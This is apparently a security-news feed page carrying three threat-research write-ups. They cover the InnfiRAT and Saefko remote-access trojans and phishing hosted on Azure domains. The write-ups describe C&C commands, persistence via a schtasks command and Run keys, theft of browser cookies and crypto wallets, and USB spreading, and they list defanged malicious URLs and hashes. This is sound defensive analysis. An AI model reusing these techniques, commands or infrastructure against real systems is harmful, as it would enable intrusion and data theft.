8: Creating a duplex channel with C&C server   After forming the duplex channel with the name IVictim, it uses the IVictim interface, which contains the following methods: “Subscribe” “CompleteTask” “GetDlls” “AvailableTasks”   Figure 9: Available methods in the IVictim interface Inside the SуkdVkцiшkUояUuчPуюяmмuty187968776() [SubscribeVictim] routine: InnfiRAT calls the subscriber method from the IVictim interface with login = “innfiniti”   Figure 10: The subscribe method from the IVictim interface is invoked Inside the хaxeYхсиghIжNпDмвQюwkуpкgимuбсфbnдбMвMC67210633684721828() [GetAndExecuteSpecifiedTask] routine: InnfiRAT obtains the tasks inside a UserTask list by invoking AvailableTasks where UserTask has the following keys: “ID” “Action” “URL” “FinalPoint” “Current”  “Status” “Country” “RunSilent” “Argument” It iterates through each task. On each iteration, it first checks for the country value received to be equal to “ALL” OR  the one present in the BasicInfoVictim class, which was obtained earlier AND the action to perform is "DownAndEx" and the URL value is available.      If the above conditions match, then the CompleteTasks method is called with three arguments:  “login” “hwid” “TaskID”   The RAT calls the routine rLPсаWFоWcTjzпTэBFWkъмзтшпD147152108377454681517643543() [ExecuteFile] with three arguments to execute the file. Arg1 = Path of the file to be executed [obtained from the URL] Arg2 = Arguments to the file to be executed [obtained from Argument key of current UserTask element] Arg3 = true/false [Obtained from RunSilent key of current UserTask element] After iterating all items in the UserTask list, it sleeps for 30,000 milliseconds.   Figure 11: Country, action, and URL checks are performed and the specified task is completed   Process checks Inside the LlсiсkнwychhVзjзNзxрFrUOE4656655235232302206601527615541285() [ProcessCheck] routine: All the running processes in the system are obtained, their names are converted to lowercase and then a check is performed to see if the name matches with any of the following strings:  “taskmgr” “processhacker” “procmon” “procexp” “pchunter” “procexp64” If there are any matches, the process terminates. Below are the snapshots depicting the actions performed.   Figure 12: Obtaining processes, converting their names to lowercase, checking specific processes   Figure 13: Converting ProcessName to lowercase   Figure 14: Checking for above-mentioned running processes (process names are obfuscated here) Inside wYxйыrоyTHuLдTч212065() [KillProcesses] routine: InnfiRAT obtains the list of all processes running in the system and kills any process whose name contains one of the following strings: “chrome” “browser” “firefox” “opera” “amigo” “kometa” “torch” “orbitum”   Figure 15: Kills processes that contain any of the above-mentioned strings   Scheduled execution Inside the эйviMhйсuьZCпJфшcкLйшuв348374() [ScheduleMalwareExecution] routine: The CMD (cmd.exe) command string is constructed and executed to schedule the malware execution. The command string looks like below:  /C schtasks /create /tn WindowsUpdater /tr "%AppData%NvidiaDriver.exe " /st HH:mm  /du 9999:59 /sc daily /ri 1 /f   Figure 16: CMD command is constructed and executed   C&C commands Here are some tasks performed by the malware based on the commands received from C&C server: 1. SendUrlAndExecute(string URL) InnfiRAT downloads the file from the specified URL by calling the routine жRfаeQbrwйfsLGыhчUrEжьFхaяGчрлCдtGжSofьQvдnIмs8383484343838630833542717281211() [DownloadFileFromUrl]. Inside this routine, a directory is first created with the name TEMP inside the %AppData% if it doesn’t exist. Then the file is downloaded and saved inside this folder with the name extracted from the passed URL. The URL passed is broken into parts via delimiter ‘/’ and the last item is used as the file name.   Figure 17: Create folder and download file   Once the download is complete, it calls the routine rLPсаWFоWcTjzпTэBFWkъмзтшпD147152108377454681517643543() [ExecuteFile] with three arguments to execute the downloaded file. Arg1 = Path of the file to be executed Arg2 = Arguments to the file to be executed Arg3 = true   Figure 18: Execute the downloaded file 2. ProfileInfo() Inside the routine, it collects the following information: “NetworkInfo”:{ "ip"  "city" "region" "country" "loc" "postal" "org" } “PCAdmin” “PCInformation” :{ “FrameWorkDescription” “Processors” “PRocessorsCore” “VideoCards” }  It then sends the information to the C&C server. Figure 19: UserProfile info being collected and sent to the C&C server   3. LoadLogs() It calls the GetDlls() routine, which obtains information inside a list of type DownloadDll where DownloadDll has two keys: “Path”,                     represents a relative path to an .exe file “ByteArray”            binary data   Figure 20: GetDlls being called   After fetching the list, InnfiRAT traverses each element inside the list via a for-loop. Inside the for-loop: The value of the Path key is split using delimiter “\\”. The second value in the split is the name of the directory. A check is performed to see if the count after the split is greater than 2 and there is no directory with the name obtained from the Path key split inside the executing module directory. If the check is true, a directory with the obtained name is created.  A check is performed if no file exists specified by Path key in the executing module directory. If the check is true, it creates the file and writes the value of ByteArray to this created file.  The routine wYxйыrоyTHuLдTч212065() [KillProcesses] is called. Finally, data obtained from UserProfile() is sent to the C&C server.   Figure 21: A directory is created, file is created, and KillProcesses is called; response is sent to the C&C server   4. LoadCookies()  - Steal Browser Cookie information InnfiRAT calls the GetDlls() routine, which obtains information inside a list of type DownloadDll where DownloadDll has two keys: “Path”                    represents a relative path to an .exe file “ByteArray”          binary data   Figure 22: GetDlls being called   After fetching the list, the malware traverses each element inside the list via for-loop. The following occurs inside the for-loop: The value of the Path key is split using the delimiter “\\”. Second, the value in the split is the name of the directory. A check is performed if the count after the split is greater than 2 and there is no directory with the name obtained from the Path key split inside the executing module directory. If the check is true, a directory with the obtained name is created.  A check is performed if no file exists specified by the Path key in the executing module directory. If a check is true, it creates the file and writes the value of ByteArray to this created file.    Figure 23: Directory is created, file is created   It creates an empty list of BrowserCook type where BrowserCook has two keys, namely: “CookiePaths” “BrowserName” The name and corresponding cookie path are retrieved for the following browsers one by one: “Chrome” “Yandex” “Kometa” “Amigo” “Torch” “Orbitum” “Opera” “Mozilla” A BrowserCook type element is created with the fetched information and is added to the list created earlier.   Figure 24: Browser info is retrieved and added to the list   It creates an empty list of BrowserCookie type where BrowserCookie has three keys, namely:  “Browser” “FileName” “FileArray” Inside, two for-loop elements of the BrowserCookie type are created, where the Browser key and FileArray key are both assigned values using the information from the previously created BrowserCook list and the FileName is set to _Cookie.txt if the browser name for the current element is not “Mozilla”, or else it is set to Cookie.txt.   Figure 25: BrowserCookie elements list is built   The harvested BrowserCookie list is then sent to the C&C server and the temporary file and directory are deleted.   Figure 26: File and directory is deleted 5. LoadWallets() - Steal Bitcoin Wallets The malware creates an empty list of the BitcoinWallet type where BitcoinWallet has two keys, namely: “WalletArray” “WalletName” A check is performed to see if a file for a Litecoin or Bitcoin wallet is present in the system at the following location: Litecoin: %AppData%\Litecoin\wallet.dat Bitcoin: %AppData%\Bitcoin\wallet.dat If it is found, then the element of type BitcoinWallet is added to the list after assigning a name to the WalletName key and reading the corresponding wallet file in the WalletArray key.   Figure 27: File presence is checked, BitcoinWallet element is added to the list   Finally, the created list is sent in response to the C&C server.   Figure 28: List is sent in response to the C&C server   6. LoadFiles() - Steal small text files potentially containing sensitive information InnfiRAT collects all the .txt files available on the desktop whose size is less than 2,097,152 bytes inside a list of CustomFile types. CustomFile has two keys namely:  “Name”   “FileArray” The created list is sent in response to the C&C server.   Figure 29: Files are collected and sent to the C&C server   Figure 30: Inside HcапkцтеuxчI46156665847187238336657104255061.лQtdjюAKMCdскHUжfъqZTzmMнуз68532317728035381607276587242500 [CollectFiles]   7. LoadProcesses() - Get the list of running processes on the victim machine InnfiRAT creates an empty list of type ProcessInfo where ProcessInfo has three keys, namely: “ID” “Name”  “Path” It obtains the list of all the processes running in the system and sends the list in response to the C&C server.    Figure 31: Process information is obtained and the list is sent to the C&C server   8. Kill(int process) - Command to Kill a specific process on the victim machine InnfiRAT obtains the list of all the processes running in the system and then inside a for-loop, the processID of obtained processes is compared with the processID passed as an argument to this routine one at a time. If there is a match, the process is killed and the flag variable is set to true. Finally, a response is sent to C&C server.   Figure 32: Process is killed and response is sent   9. Screenshot() - Take a screenshot on the victim machine It calls the qюFpьGoJv97921676245() [CaptureScreenshot] routine and the returned value is sent to the C&C server.   Figure 33: Screenshot captured and sent to the C&C server   Figure 34: Inside the qюFpьGoJv97921676245() [CaptureScreenshot] routine   10. RunCommand(string command) - Execute specified command on the victim machine This creates a new CMD process, builds the command line argument using the command passed as an argument to this routine, and finally starts the process. Command line argument:   /c  +  “ ” + command   Figure 35: Received command is executed   11. ClearCooks() - Clears browser Cookies on the victim machine for specific Browsers InnfiRAT creates an empty list of BrowserCook type where BrowserCook has two keys, namely: “CookiePaths”  “BrowserName” The name and corresponding cookie path are retrieved for the following browsers one by one: “Chrome” “Yandex” “Kometa” “Amigo” “Torch” “Orbitum” “Opera” “Mozilla”   A BrowserCook type element is created with the fetched information and is added to the list created earlier. Figure 36: Browser info is retrieved and added to the list   The routine wYxйыrоyTHuLдTч212065() [KillProcesses] is called. The BrowserCook type list created earlier is traversed and cookies files are deleted using CookiePaths key value. Finally, a response is sent to the C&C server.   Figure 37: The routine wYxйыrоyTHuLдTч212065() [KillProcesses] is called, cookie files are deleted, and response is sent to the C&C server Conclusion A RAT, remote-access trojan, is a type of malware that includes a backdoor, giving intruders the ability to control the targeted computer remotely and enabling them to perform any number of tasks, such as logging keystrokes, accessing confidential information, activating the system's webcam, taking screenshots, formatting drives, and more. They can also be designed to spread to other systems on a network. Because RATs are usually downloaded as a result of a user opening an email attachment or downloading an application that has been infected, the first line of defense is often the users who must, as always, refrain from downloading programs or opening attachments that aren't from a trusted source. The ThreatLabZ team continues to monitor this threat and ensure that Zscaler customers are protected.   IOCs Md5: f992dd6dbe1e065dff73a20e3d7b1eef Downloading URL: rgho[.]st/download/6yghkhzgm/84986b88fe9d7e3caf5183e4342e713adf6c3040/df3049723db33889ac49202cb3a2f21ac1b82d5b/peugeot.zip NetworkURL: tcp://62[.]210[.]142[.]219:17231/IVictim
Categorías: Security Posts

Saefko: A new multi-layered RAT

Zscaler Research - Hace 1 hora 14 mins
Recently, the Zscaler ThreatLabZ team came across a new remote-access trojan (RAT) for sale on the dark web. The RAT, called Saefko, is written in .NET and has multiple functionalities. This blog provides a detailed analysis of this piece of malware, including its HTTP, IRC, and data stealing and spreading module.   Background A RAT is a type of malware that includes a backdoor for remote administrative control of the targeted computer. RATs are usually downloaded as a result of a user opening an email attachment or downloading an application or a game that has been infected. Because a RAT enables administrative control, the intruder can do just about anything on the targeted computer, such as monitoring user behavior by logging keystrokes, accessing confidential information, activating the system's webcam, taking screenshots, formatting drives, and more. Upon successful infection, the Saefko RAT stays in the background and executes every time the user logs in. It fetches the chrome browser history looking for specific types of activities, such as those involving credit cards, business, social media, gaming, cryptocurrency, shopping, and more. It sends the data it has collected to its command-and-control (C&C) server and requests for further instructions. The C&C instructs the malware to provide system information and the RAT will begin to collect a range of data including screenshot,videos, keystroke logs and more. The C&C can also instruct the malware to download additional payload onto the infected system. RATs present a unique business threat. They have the ability to steal a lot of data without being detected and spread to other systems across the network. The ThreatLabZ team also detonated the Saefko RAT in the Zscaler Cloud Sandbox to determine its functionality, communications, and the potential threat.   Technical Analysis of the Saefko RAT Saefko malware unpacks itself and places the saefkoagent.exe file in “/%AppData%/Roaming/SaefkoAgent.exe” and executes it. It also copies itself to “/%AppData%/Roaming/windows.exe” and "/%AppData%/Local/explorer.exe” and executes them. Autostart Key The Saefko malware creates a startup key to execute the malware at every login. If it is executing from an admin account, it creates the following registry key: “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer” Otherwise, it creates a registry key in the following path: “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer” Functionality Saefko first checks to see whether the internet connection is active by connecting to “clients3.google.com/generate_204”. It then uses a unique technique to identify if the infected system contains any vital information. It fetches the browser history and searches for particular websites that have been visited by the user and makes a count based on the categories mentioned below. From the counts, the attacker can determine which systems it should target first from all the infected systems. The list of different categories it searches include: Credit card possibility paypal.com 2c2p adyen.com volusion.com pay.amazon.com apple.com/apple-pay/ atos.net authorize.net BIPS bitpay.com bpay.com braintreepayments.com centup.org cm.com creditcall.com cybersource.com mastercard.com digi.cash digitalriver.com dwolla.com elavon.com euronetworldwide.com eway.io firstdata.com fortumo.com pay.google.com/send/home heartlandpaymentsystems.com ingenico.com ippayments.com klarna.com emergentpayments.ne moduslink.com mpay.com neteller.com ofx.com pagseguro payoneer.com paymentwall.com paypoint.co paysbuy.com paysafe.com paytm.com payzone.co.uk crunchbase.com qiwi.com globalpaymentsinc.com reddotpayment.com sagellc.com skrill.com stripe.com squareup.com tencent.com transfermate.com transferwise.com wmtransfer.com trustly.com wepay.com verifone.com xendpay.com pay.weixin.qq.com money.yandex.ru wirecard.com truemoney.com xsolla.com myshopify.com/admin payza.com 2checkout.com 3dcart.com paysafecard.com weebly.com       Gaming activity value origin.com steampowered.com g2a.com twitch.tv nichegamer.com techraptor.net gematsu.com estructoid.com pcgamer.com gamefaqs.gamespot.com gamespot.com siliconera.com rockpapershotgun.com gameinformer.com decluttr.com glyde.com gamestop.com microsoft.com/account/xboxlive playstation.com/en-us/network/store nintendo.com/games gog.com game.co.uk itch.io gamefly.com greenmangaming.com gaming.youtube.com     Cryptocurrency value etoro.com 24option.com puatrack.com/coinbull2/ luno.com paxforex.com binance.com coinbase.com cex.io changelly.com coinmama.com xtrade.ae capital.com paxful.com kraken.com poloniex.com gemini.com bithumb.com xcoins.io cobinhood.com coincheck.com coinexchange.io shapeshift.io bitso.com indacoin.com cityindex.co.uk bitbay.net bitstamp.net cryptopia.co.nz pro.coinbase.com kucoin.com bitpanda.com foxbit.com.br bitflyer.com bitfinex.com bit-z.com quadrigacx.com quadrigacx.com big.one lakebtc.com wex.nz kuna.io yobit.io zebpay.com hitbtc.com bx.in.th trezor.io electrum.org blockchain.com crypto.robinhood.com exodus.io mycelium.com bitcointalk.org btc-e.com moonbit.co.in bitcoinaliens.com bitcoinwisdom.com coindesk.com cointelegraph.com ccn.com reddit.com/r/Bitcoin/ bitcoin.org/en/blog newsbtc.com blog.spectrocoin.com blog.coinbase.com bitcoinist.com forklog.com abitcoinc.com bitcoin.stackexchange.com news.bitcoin.com blog.bitfinex.com blog.genesis-mining.com     Instagram activity instagram.com m.instagram.com   Facebook activity facebook.com m.facebook.com   Youtube activity youtube.com m.youtube.com   Google+ activity plus.google.com m.plus.google.com   Gmail activity gmail.com mail.google.com   Shopping activity boohoo.com gymshark.com mail.google.com prettylittlething.com showpo.com athleta.com ae.com ruelala.com asos.com superdry.com zaful.com zafulswimwear.com luckybrand.com forever21.com urbanoutfitters.com nastygal.com jcrew.com anthropologie.com allsaints.com uniqlo.com armaniexchange.com fashionnova.com saksoff5th.com target.com macys.com barneys.com zappos.com sneakersnstuff.com yoox.com nike.com simmi.com amazon.com ebay.com walmart.com newegg.com bestbuy.com ftd.com 1800flowers.com glossier.com sephora.com thebodyshop.com ulta.com horchow.com homedepot.com pier1.com bedbathandbeyond.com wayfair.com shoptiques.com viator.com etsy.com cloud9living.com seatgeek.com aliexpress.com alibaba.com       Business value linkedin.com twitter.com nasdaq.com ft.com reuters.com nyse.com tsx.com marketwatch.com thestreet.com wsj.com investing.com investopedia.com finance.yahoo.com seekingalpha.com fool.com investorguide.com zacks.com home.saxo forexbrokers.com swissquote.com cmcmarkets.com fxpro.co.uk forex.com dukascopy.com interactivebrokers.com tdameritrade.com bankofinternet.com ally.com bankpurely.com redneck.bank       Saefko also collects additional user application data, including: Command Description irc_channel IRC channel name irc_nickname Nickname irc_password IRC channel Password irc_port IRC Port for communication to a server irc_server Server name machine_active_time System uptime machine_artct Machine Architecture machine_bitcoin_value Number of cryptocurrency sites visited by the user machine_business_value Number of business sites visited by the user machine_calls_activity 0 machine_camera_activity No. of “.png” files present on the desktop machine_country_iso_code Country code fetch from “ipinfo.io/geo” machine_lat latitude machine_lng longitude machine_creadit_card_posiblty Checks the number of payment sites visited by the user machine_current_time Taking machine current time machine_facebook_activity Checks the number of times the user visited facebook machine_gaming_value Checks the number of times the user visited gaming websites machine_gmail_avtivity Checks the number of times the user visited gmail machine_googleplus_activity Checks the number of times the user visited google+ machine_instgram_activty Checks the number of times the user visited Instagram machine_ip Machine IP machine_lat The geographic location of the system (latitude) machine_lng The geographic location of the system (longitude) machine_os_type 1 machine_screenshot Captures screenshot and encode it in base 64 machine_shooping_activity Checks number of times shopping sites visit by the user   The RAT sends the collected data to a command and control server as shown below: After getting an "ok" response from the server, Saefko begins the "StartServices" function, which has four different infection modules: HTTPClinet IRCHelper KEYLogger StartLocalServices (USB spreading) HTTP Clinet (Possible misspelling of HTTP Client by the author) The RAT sends a request to the server, requesting for a new task. It sends a command “UpdateAndGetTask” and also sends other information, including machine_ID, machine_os, and privateip, as shown below: The task is the URL from which the malware downloaded the new payload and executed it on the infected machine. Key Logger The malware uses the SetWindowsHookEx API for capturing keystrokes. It stores the captured keystrokes into a “log.txt” file. The filepath is: “\%AppData%\Local\log.txt.” IRC Helper First, the malware disconnects the current IRC connection. Then, it sends status information to the C&C as shown below: pass: password command: UpdateHTTPIRCStatus machine_id: unique id sent by C&C in an earlier request irc_status: 1  Next malware fetch  Serverlist: it selects a server from the list below. Port: port  Nickname: generates a random 7 character name  List of IRC servers and ports IRC server Port IRC server Port irc.afterx.net 6667 irc.cyanide-x.net 6667 chat.freenode.net 6667 irc.europnet.org 6667 irc.azzurra.org 6669 irc.rizon.net 6669 irc.dal.net 6667 irc.efnet.org 6667 irc.gamesurge.net 6667 open.ircnet.net 6669 irc.quakenet.org 6667 irc.swiftirc.net 6667 eu.undernet.org 6667 irc.webchat.org 7000 irc.2600.net 6667 irc.abjects.net 6669 irc.accessirc.net 6667 irc.afternet.org 6667 irc.data.lt 6667 irc.allnetwork.org 6667 irc.alphachat.net 6667 irc.austnet.org 6667 irc.axenet.org 6667 irc.ayochat.or.id 6667 irc.beyondirc.net 6669 irc.blitzed.org 6667 irc.bongster.org 6669 irc.caelestia.net 6667 irc.canternet.org 6667 irc.chatall.org 6669 irc.chatcafe.net 6667 irc.chatspike.net 6667 irc.chatzona.org 6667 irc.criten.net 6667 irc.cyberarmy.net 6667 irc.d-t-net.de 6667 irc.darkmyst.org 6667 irc.deepspace.org 6667 irc.dream-irc.de 6667 irc.drlnet.com 6667 irc.dynastynet.net 6667 irc.echo.com 6667 irc.ecnet.org 6667 irc.enterthegame.com 6667 irc.epiknet.org 6667 irc.esper.net 6667 irc.euirc.net 6669 irc.evolu.net 6667 irc.explosionirc.net 6667 irc.fdfnet.net 6668 irc.fef.net 6667       Saefko connects to one of these servers and waits for a response. In the response, it checks for “T_T” string and any separate messages using that string. Below is the list of IRC functions that the RAT can perform. According to the command it receives, Saefko will respond with corresponding data. List of IRC Commands IRC Command Description dexe Download a file from a given URL and execute it hdexe Download a file from a given URL and execute it (UseShellExecute=false) vistpage Open URL hvistpage Open URL (UseShellExecute = false) snapshot Captures video frame, converts into Base64 and sends to C&C (Detailed information explained below); also replies “.oksnapshot” shell Executes command using cmd.exe tcp Makes a tcp connection using a given IP and port. identify Send system information: OS type: Microsoft windows OS version: OS version OS Username: username OS MachineName: System name OS SystemDirectory: System Directory opencd Open CDROM drive. Command: set CDAudio door open closecd Close CDROM drive. Command: set CDAudio door closed screenshot Capture screenshot, encode it into Base64 and send to C&C ping Reply “okping” camlist Gets the video devices from the system and sends information to the C&C.Detailed information explained below. pwd Current directory location Gets the system location using “https://ipinfo.io/geo” IP, city, region, country, latitude and longitude keylogs Encode the keylog file (log.txt) using base64 and send it to C&C uninstall Delete the autostart registry key (RUN) and terminate itself.   Camlist Saefko also searches for the following payloads in the system: AForge.dll AForge.Video.DirectShow.dll AForge.Video.dll Sqlite3.dll If these files are not present, the malware sends a request to the C&C to download these files. Next, it searches for a list of video input devices on the targeted system and sends the related information to the C&C. Snapshot Saefko also captures videos from the device present on the system, encodes the video frame with Base64 and sends it to the C&C. Start USB Service Saefko checks to see if the drive type is either removable or networked, after which it starts the infection and copies the files below onto a removable drive. Sas.exe USBStart.exe usbspread.vbs Sas.exe is a copy of the malware itself. USBStart.exe is fetched from the resource section of the main binary. It contains code to execute Sas.exe. It creates a usbspread.vbs file then executes it. It searches every directory and all the files and creates a "lnk" file for each file and directory with a target path USBStart.exe file. When the removable device is plugged in any other system, the user is tricked into clicking a lnk file as the main files and folder are hidden. Lnk file executes the USBStart.exe that ends up executing Sas.exe which is the main payload. So it futher infect other Systems. Below is the code of the usbspread.vbs file: One online forum has an ad for a cracked Saefko RAT tool as shown below. It is a multi-protocol, multi-operating system remote administration tool that can be used to launch the malware on Windows and Android devices.   Conclusion To protect systems from RATs, users must refrain from downloading programs or opening attachments that aren't from a trusted source. At the administrative level, it's always a good idea to block unused ports, turn off unused services, and monitor outgoing traffic. Attackers are often careful to prevent the malware from doing too much activity at once, which would slow down the system and possibly attract the attention of the user and IT. Zscaler ThreatLabZ team continues to monitor this threat and others to ensure that Zscaler customers are protected.   IOCs Md5: D9B0ECCCA3AF50E9309489848EB59924 C4825334DA8AA7EA9E81B6CE18F9C15F 952572F16A955745A50AAF703C30437C 4F2607FAEC3CB30DC8C476C7029F9046 7CCCB06681E7D62B2315761DBE3C81F9 5B516EAB606DC3CC35B0494643129058 Downloader URL: industry.aeconex[.]com/receipt-inv.zip 3.121.182[.]157/dwd/explorer.exe 3.121.182[.]157/dwd/vmp.exe deqwrqwer.kl[.]com.ua/ex/explorer.exe maprivate[.]date/dhl-miss%20craciun%20ana%20maria%20#bw20feb19.zip Network URL: acpananma[.]com/love/server.php 3.121.182[.]157/smth/server.php f0278951.xsph[.]ru/server.php maprivate[.]date/server.php
Categorías: Security Posts

Abusing Microsoft’s Azure domains to host phishing attacks

Zscaler Research - Hace 1 hora 14 mins
Recently, the Zscaler ThreatLabZ team came across various phishing attacks leveraging Microsoft Azure custom domains. These sites are signed with a Microsoft SSL certificate, so they are unlikely to raise suspicion about their authenticity. We notified Microsoft, who quickly engaged to shut these sites down, while we took action to detect and block 2,000 phishing attempts from these domains over a six-week period.  In this blog, we will describe two of the prominent vectors used and we’ll show several examples of the phishing pages. The following figure depicts the phishing hits that were hosted using the Azure domain (Windows.net) and blocked by the Zscaler cloud. Fig 1: Phishing hits using the Azure domain web.core.windows.net (green) and blob.core.windows.net (orange)   The following is the Whois lookup information related to the Windows.net domain. Fig 2: Whois lookup info for domain Windows.net domain   For these phishing campaigns, the delivery vector was spam emails. CASE 1: In this case, the attacker sends a spam email to a user, appearing to come from a particular organization and notifying the user that seven emails have been quarantined. It states that in order to review the emails, the user has to log in using the work or school account. Fig 3: Spam email with direct phishing link   If the user clicks the view emails button, it will redirect to the Outlook login phishing page (hxxps://onemailofice365(.)z13(.)web(.)core(.)windows(.)net/index(.)html). Fig 4: Outlook login phishing page   Some users may get confused because of the unknown URL hosting the Outlook login page. To trick those users, the attackers have used the SSL certificate issued by Microsoft as shown below. Fig 5: SSL certificate page of the hosted phishing URL   The following figure depicts the source code of the phishing page, which is used by attackers to collect users’ data. Fig 6: Source code of the phishing URL page   Once the login information has been entered by the user, the form will post the user’s credential details to the compromised domain that is operated by the cybercriminals. Fig 7: Captured data traffic that has been sent to the attacker’s site   CASE 2: In this method, attackers send the spam email with an attached HTML file that looks like a voice message. Once the user clicks the HTML file, it will redirect to the phishing page hosted using the Azure domain. Fig 8: Spam mail with double extension method   Fig 9: Outlook login phishing page redirected from voice message   In this phishing campaign, the attackers have injected obfuscated JavaScript to validate the user credentials that are present in their database to avoid duplication. Fig 10: Obfuscated JavaScript to validate user credentials to avoid duplication   The following figure depicts the deobfuscated JavaScript. This code will validate the user’s credential details and sent it to the attacker’s server (hxxps://validr2vtap2l3eh544kb(.)azurewebsites(.)net/v20(.)php). Fig 11: Deobfuscated JavaScript Fig 12: User data will be sent to the attacker’s site using the function getValidatorURL().   In addition to the Outlook phishing campaigns, we have seen phishing campaigns associated with these Azure domains: Microsoft Phishing, OneDrive Phishing, Adobe Document Phishing, Blockchain Phishing, and more. The following figure shows the different phishing campaigns that are hosted using the Azure domain (Windows.net). Fig 13: Microsoft login phishing page   Fig 14: Adobe login phishing page   Fig 15: Blockchain login phishing page   Fig 16: OneDrive login phishing page   Conclusion The Zscaler cloud blocked more than 2,000 phishing attacks over six weeks that were hosted using the Azure domain (Windows.net). The following diagram represents the various kinds of phishing campaigns that were blocked by the Zscaler cloud. Fig 17: Detected phishing hits    Fig 18: The Zscaler Zulu URL Risk Analyzer score for one of the phishing URLs   IOCs 039282fsd(.)z19(.)web(.)core(.)windows(.)net 3652adua38ea(.)z5(.)web(.)core(.)windows(.)net 378468459jjn(.)z19(.)web(.)core(.)windows(.)net 623623626638885047749469(.)z19(.)web(.)core(.)windows(.)net 86hoi2a8j592hf2(.)z14(.)web(.)core(.)windows(.)net accounhostoutlook(.)z35(.)web(.)core(.)windows(.)net accountsupdate(.)z22(.)web(.)core(.)windows(.)net adobe111(.)z19(.)web(.)core(.)windows(.)net appriver(.)z19(.)web(.)core(.)windows(.)net azaman(.)blob(.)core(.)windows(.)net bchwalletblockchain(.)z13(.)web(.)core(.)windows(.)net bitcoinwalletrecovery(.)z13(.)web(.)core(.)windows(.)net blockchainofficesupport(.)z13(.)web(.)core(.)windows(.)net blockchainrecoverywalet(.)z13(.)web(.)core(.)windows(.)net blockchaintradindinvest(.)z13(.)web(.)core(.)windows(.)net businessdrivefilesharing(.)z33(.)web(.)core(.)windows(.)net dlgeus(.)blob(.)core(.)windows(.)net dlgneu(.)blob(.)core(.)windows(.)net dlgweu(.)blob(.)core(.)windows(.)net driveoffice- secondary(.)z13(.)web(.)core(.)windows(.)net eastexch030serverdatanet(.)z13(.)web(.)core(.)windows(.)net edustudioapp(.)z19(.)web(.)core(.)windows(.)net exchangeonline80293745(.)z27(.)web(.)core(.)windows(.)net finance51(.)z13(.)web(.)core(.)windows(.)net fukshawefwe22(.)blob(.)core(.)windows(.)net fundingmessan(.)z13(.)web(.)core(.)windows(.)net gry1asdqw1(.)blob(.)core(.)windows(.)net h0vbkkkeebweybv(.)z33(.)web(.)core(.)windows(.)net hgnghhghkkdkdh(.)z13(.)web(.)core(.)windows(.)net hp94549754083400j9302975(.)z21(.)web(.)core(.)windows(.)net hsdv(.)blob(.)core(.)windows(.)net linknec39cclzg5l591f(.)z19(.)web(.)core(.)windows(.)net linkp4klg1qkni76yoz8(.)z19(.)web(.)core(.)windows(.)net lpdmsonline(.)blob(.)core(.)windows(.)net macrofinancesoftonline(.)z14(.)web(.)core(.)windows(.)net macrosoft0nlineoffice365(.)z13(.)web(.)core(.)windows(.)net mailingofficeupdate(.)z14(.)web(.)core(.)windows(.)net mailofficemicr0softvalid(.)z35(.)web(.)core(.)windows(.)net mailofficesecurity(.)z13(.)web(.)core(.)windows(.)net mailofficeveridiers(.)z33(.)web(.)core(.)windows(.)net mailoutlookmcrosoftupdat(.)z11(.)web(.)core(.)windows(.)net mailoutnewsecurity(.)z14(.)web(.)core(.)windows(.)net mak17opa54vjxu8(.)z7(.)web(.)core(.)windows(.)net mdj34598720843(.)z10(.)web(.)core(.)windows(.)net microexchyz42nhszseheys(.)z13(.)web(.)core(.)windows(.)net micromuze3rlokoyg(.)z14(.)web(.)core(.)windows(.)net microrel00ukelukleqwkoxl(.)z13(.)web(.)core(.)windows(.)net microsofbt50xjotm45wm7al(.)z11(.)web(.)core(.)windows(.)net microsofd8f82gtrjyaajnsj(.)z11(.)web(.)core(.)windows(.)net microsofdi3o152rpnnt2zr8(.)z11(.)web(.)core(.)windows(.)net microsoffn4xwr5df3emnh1m(.)z11(.)web(.)core(.)windows(.)net microsofn642b7o2un27wptm(.)z13(.)web(.)core(.)windows(.)net microsofq2622c5r3wpfsdnp(.)z11(.)web(.)core(.)windows(.)net microsofzwafvh6bisrici50(.)z11(.)web(.)core(.)windows(.)net offic664ghdtsgdyddux(.)z13(.)web(.)core(.)windows(.)net officcee(.)z13(.)web(.)core(.)windows(.)net office365user37773773673(.)z19(.)web(.)core(.)windows(.)net officedelist(.)z13(.)web(.)core(.)windows(.)net officefiledata(.)z13(.)web(.)core(.)windows(.)net onemailofice365(.)z13(.)web(.)core(.)windows(.)net outlookloffice365user23k-secondary(.)z14(.)web(.)core(.)windows(.)net outlookloffice365user25u-secondary(.)z33(.)web(.)core(.)windows(.)net outlookloffice365user65t-secondary(.)z6(.)web(.)core(.)windows(.)net outlookloffice365user65t(.)z6(.)web(.)core(.)windows(.)net outlookloffice365userl6m(.)z13(.)web(.)core(.)windows(.)net outlookofficecom(.)z33(.)web(.)core(.)windows(.)net outlookproctionmail(.)z9(.)web(.)core(.)windows(.)net outwebsignin2094598209(.)z21(.)web(.)core(.)windows(.)net parmalat7(.)blob(.)core(.)windows(.)net pjkiojxyfngsss(.)z13(.)web(.)core(.)windows(.)net pssastd(.)blob(.)core(.)windows(.)net rel00ukelukleqwkoxl(.)z6(.)web(.)core(.)windows(.)net sams2948818388301(.)z13(.)web(.)core(.)windows(.)net secureofficeportal(.)z19(.)web(.)core(.)windows(.)net sharepo7(.)z22(.)web(.)core(.)windows(.)net sharepointewk8xpzoywq7j(.)z19(.)web(.)core(.)windows(.)net supportoffices365(.)z33(.)web(.)core(.)windows(.)net thursday(.)z19(.)web(.)core(.)windows(.)net ttsokaejqumuamreio(.)z6(.)web(.)core(.)windows(.)net under12(.)z19(.)web(.)core(.)windows(.)net user111777999973sdxc(.)z11(.)web(.)core(.)windows(.)net user37377377733(.)z22(.)web(.)core(.)windows(.)net user7779793e792782(.)z14(.)web(.)core(.)windows(.)net user8877773737(.)z11(.)web(.)core(.)windows(.)net usernamewebmailsingin(.)z14(.)web(.)core(.)windows(.)net v83oybtn5zp5mmz(.)z14(.)web(.)core(.)windows(.)net validatnec39cclzg5l591f(.)z19(.)web(.)core(.)windows(.)net voice88(.)z19(.)web(.)core(.)windows(.)net voicserel00ukeluklwkoxl(.)z13(.)web(.)core(.)windows(.)net webusermicr0softtonlinee(.)z33(.)web(.)core(.)windows(.)net were12(.)z19(.)web(.)core(.)windows(.)net weree(.)z6(.)web(.)core(.)windows(.)net wimdowoutlkjxjy0846335f(.)z13(.)web(.)core(.)windows(.)net yamma(.)z13(.)web(.)core(.)windows(.)net zebra11(.)z19(.)web(.)core(.)windows(.)net azaman(.)blob(.)core(.)windows(.)net dlgeus(.)blob(.)core(.)windows(.)net dlgneu(.)blob(.)core(.)windows(.)net 